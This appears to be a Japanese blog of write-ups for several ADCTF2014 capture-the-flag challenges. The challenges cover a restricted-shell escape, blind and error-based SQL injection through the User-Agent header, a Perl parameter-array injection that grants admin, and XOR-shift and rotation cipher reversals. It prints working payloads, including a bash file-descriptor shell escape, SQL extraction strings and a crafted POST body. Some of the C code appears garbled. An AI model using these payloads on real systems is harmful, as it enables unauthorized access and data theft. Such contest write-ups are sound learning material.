ADCTF2014 [16] blind shell
Restriction: You can't use any commands. (actually/bin/bash
only) Do not brute force. You don't need to. blind_shellnc pwnable.katsudon.org 44010
今日のは多分シェル芸だろうな
まずはgdbで解析
(gdb) x/128gx 0x400a88 0x400a88: 0x00000000004009c0 0x0000000000400990 0x400a98: 0x0000000000400990 0x00000000004009c9 0x400aa8: 0x00000000004009c9 0x0000000000400990 0x400ab8: 0x00000000004009c9 0x0000000000400990 0x400ac8: 0x0000000000400990 0x0000000000400990 0x400ad8: 0x00000000004009c9 0x0000000000400990 0x400ae8: 0x0000000000400990 0x0000000000400990 0x400af8: 0x0000000000400990 0x0000000000400990 0x400b08: 0x00000000004009c9 0x00000000004009c9 0x400b18: 0x00000000004009c9 0x00000000004009c9 0x400b28: 0x00000000004009c9 0x00000000004009c9 0x400b38: 0x00000000004009c9 0x00000000004009c9 0x400b48: 0x00000000004009c9 0x00000000004009c9 0x400b58: 0x00000000004009c9 0x00000000004009c9 0x400b68: 0x00000000004009c9 0x00000000004009c9 0x400b78: 0x00000000004009c9 0x0000000000400990 0x400b88: 0x00000000004009c9 0x00000000004009c9 0x400b98: 0x00000000004009c9 0x00000000004009c9 0x400ba8: 0x00000000004009c9 0x00000000004009c9 0x400bb8: 0x00000000004009c9 0x00000000004009c9 0x400bc8: 0x00000000004009c9 0x00000000004009c9 0x400bd8: 0x00000000004009c9 0x00000000004009c9 0x400be8: 0x00000000004009c9 0x00000000004009c9 0x400bf8: 0x00000000004009c9 0x00000000004009c9 0x400c08: 0x00000000004009c9 0x00000000004009c9 0x400c18: 0x00000000004009c9 0x00000000004009c9 0x400c28: 0x00000000004009c9 0x00000000004009c9 0x400c38: 0x00000000004009c9 0x00000000004009c9 0x400c48: 0x00000000004009c9 0x00000000004009c9 0x400c58: 0x00000000004009c9 0x0000000000400990 0x400c68: 0x0000000000400990 0x0000000000400990 0x400c78: 0x0000000000400990 0x00000000004009c9 0x400c88: 0x0000000000400990 0x00000000004009c9 0x400c98: 0x00000000004009c9 0x00000000004009c9 0x400ca8: 0x00000000004009c9 0x00000000004009c9 0x400cb8: 0x00000000004009c9 0x00000000004009c9 0x400cc8: 0x00000000004009c9 0x00000000004009c9 0x400cd8: 0x00000000004009c9 0x00000000004009c9 0x400ce8: 0x00000000004009c9 0x00000000004009c9 0x400cf8: 0x00000000004009c9 0x00000000004009c9 0x400d08: 0x00000000004009c9 0x00000000004009c9 0x400d18: 0x00000000004009c9 0x00000000004009c9 0x400d28: 0x00000000004009c9 0x00000000004009c9 0x400d38: 0x00000000004009c9 0x00000000004009c9 0x400d48: 0x00000000004009c9 0x00000000004009c9 0x400d58: 0x00000000004009c9 0x00000000004009c9 0x400d68: 0x00000000004009c9 0x00000000004009c9 0x400d78: 0x0000000000400990
ASCII文字の使用の不可の判断にjmp先のアドレスを指定して使われてるようですね
0x004009c9にjmpならセーフ、0x004009c0は回数限定、0x00400990は即終了
従って、英数字は全て大丈夫として、記号が以下の通りに分類されます。
使用可:#$&*:;<=>@_{|}
一回のみ使用可:SP
使用不可:!"%'()+,-./?[]^_`DEL
さて、これらで何をしようかな
bashの組み込みコマンドは使えるようなので、それらを駆使しようと思います。
まずはこれらを投げます
exec<&4>&4;read cmd;${cmd} /bin/bash
プログラムのソケットのfdは4でしたので入出力を繋げて、環境変数cmdにreadで『/bin/bash』を読み込ませます。
for path in ./*; do echo ${path}; done
ディレクトリ内のファイル一覧を表示させ
cd flag_is_in_dir
ディレクトリを移動後、再びファイル一覧表示
while read line; do echo ${line}; done < this_is_flag
フラグを取得
FLAG: ADCTF_y0u_C4N_533_y0U_c4N_br34tH
ADCTF2014 [14] secret table
またしてもSQLinjectionだ
楽しみだw
Yes, you can do sqli. Find our secret table and get the flag. Sorry, I'm missing source code. secrettable.adctf2014.katsudon.org
またしてもUser-Agentでインジェクションをするらしいな
しかし、今度は表示に変化がない・・・とおもいきや、文法エラーを起こすとServer error
うん、これError Based Blind SQL injectionだな
ここまでわかったものの、どうやってエラーを引き起こそう
どうやらCASE文が使えるらしいぞ
'+(case when (select substr('hoge',1,1)) > 'a' then 1 end)+'
成立すれば200が返ってくるし、ダメなら500だ
そんな感じでやってると、今度はこれはSQLiteということが判明
コードを書きなおしてこれでいこう
そんで、これが得られました
CREATE TABLE super_secret_flag__Ds7KLcV9 yo_yo_you_are_enjoying_blind_sqli TEXT
よし、もっかい
やったね
FLAG: ADCTF_ERR0r_hELP5_8L1nd_5Ql1
ADCTF2014 [13] loginpage
ログインページだー
You can't guess LOGINPAGE_SECRET absolutely, it's not answer. So, maybe there are some vulnerability and you got an admin and flag. I wrote this web app on Oct. 28 2014. Perl is awesome language and I love it :) loginpage.adctf2014.katsudon.org source
あれ、この問題どっかで見たことあるよ
あ、ちょっと違うけどこれだ
へぇー
同名パラメタでparamメソッドに渡すと配列を受け取れるのね
しかも、ハッシュ生成時に配列を含むと、インジェクションできるとか
脆弱性はloginpage.plの75行目から80行目にあり!
[perl] $self->session->{user} = { name => $self->param('name'), pass => $self->param('pass'), give_me_flag => 0, admin => $is_admin, }; [/perl]
じゃあPOSTでこうしましょ name=ShiftCrops&pass=abcd&pass=admin&pass=1&pass=give_me_flag
[perl] $self->session->{user} = { 'name' =>'ShiftCrops', 'pass' => 'abcd', 'admin' => 1, 'give_me_flag' => 'give_me_flag', '0' => 'admin', $is_admin => , }; [/perl]
FLAG:ADCTF_L0v3ry_p3rl_c0N73x7
ADCTF2014 [11] blacklist
SQL injectionキター
We have stupid blacklist. The flag is in flag
table.
blacklist.adctf2014.katsudon.org
source
さてさて、どこに脆弱性があるのかなー?
blacklist.plを読むと、20行目で接続元のUser-AgentとIPをそのままInsertしていますね。
IPは変えられなくても、User-Agentは任意の文字列に変えられるので、これで攻撃しようと思います。
しかし、ここで一つ問題が
仮に『','hoge')#』なんていう文字列を送ったとしても、'hoge'はipに格納されてしまうためこれじゃあ見られないなぁ
あ、valuesに対して二つの (ry そうだった『),(』使えないんだ
う~ん、、、
あれ、数値ってもしかして
『'+conv(hex*1,16,10)+'』と送ると、『1752131429』という値が返ってきました。
『hoge』⇒『68 6F 67 65』⇒『1752131429』
これでイケるぜ!!
ただ、数値の上限があるから5文字ずつ取り出しますかね
INFORMATION_SCHEMA.TABLESからテーブル名flag
INFORMATION_SCHEMA.COLUMNSからカラム名flag is here!!!
が分かります
あとはselect flag is here!!!
from flagするだけー
FLAG: ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT
ADCTF2014 [10] xor
xor+shiftの暗号かぁー
712249146f241d31651a504a1a7372384d173f7f790c2b115f47
Source Code:
[c]
#include <stdio.h>
#include <string.h>
int main() {
char flag = "ADCTF_XXXXXXXXXXXXXXXXXXXX";
int len = strlen(flag);
for (int i = 0; i < len; i++) {
if (i > 0) flag[i] ^= flag[i-1];
flag[i] ^= flag[i] >> 4;
flag[i] ^= flag[i] >> 3;
flag[i] ^= flag[i] >> 2;
flag[i] ^= flag[i] >> 1;
printf("%02x", (unsigned char)flag[i]);
}
return 0;
}
[/c]
昔、某k○nctfの暗号問題を解くときに書いたプログラムをそのまま流用するか
[c]
include <stdio.h>
include <string.h>
unsigned long decXORShift_R(unsigned long,int);
int main(void){ int i; char flag = {0x71,0x22,0x49,0x14,0x6f,0x24,0x1d,0x31,0x65,0x1a,0x50,0x4a,0x1a,0x73,0x72,0x38,0x4d,0x17,0x3f,0x7f,0x79,0x0c,0x2b,0x11,0x5f,0x47,0x00}; int len = strlen(flag);
for(i=len-1; i>=0; i--){ flag[i]=decXORShift_R(flag[i],1); flag[i]=decXORShift_R(flag[i],2); flag[i]=decXORShift_R(flag[i],3); flag[i]=decXORShift_R(flag[i],4); if(i>0) flag[i] ^= flag[i-1]; } printf("%s",flag);
return 0; }
unsigned long decXORShift_R(unsigned long x,int t){ unsigned long y=x, z=0; for(unsigned long mask=((1U<<t)-1)<<(sizeof(long)*8-t);mask;mask>>=t){ z |= (y&mask)>>t; y = zx; } return y; }
[/c]
元のプログラムはand演算を加味したものも解けるようにしてあったのだけど、今回は必要ないから取り除きました
FLAG: ADCTF_51mpl3_X0R_R3v3r51n6
ADCTF2014 [09] qrgarden
ADCTF2014 [08] rotate
今日は問題文はございません
以下のファイルだけー
rotate.zip
エンコードに用いられたコードと、flag.jpgがエンコードされたflag.jpg.encが含まれているzipファイルが渡されます。
コードを見ると、やっていることは回転行列そのものを用いてますね
だったら、その逆行列にかけてやれば良いことなのだが、生憎何度の回転をかけたのかが分かりません。
とは言っても、keyは整数限定なので360回1度ずつ回すだけで全てです。
じゃあブルートフォースで良いよね?
その結果、keyは123°であることが分かりました。
上のプログラムを用いて、『solve_rotate.py decode flag.jpg 123』で走ります。
・・・うーん
何この変な絵
FLAG: ADCTF_TR0t4T3_f4C3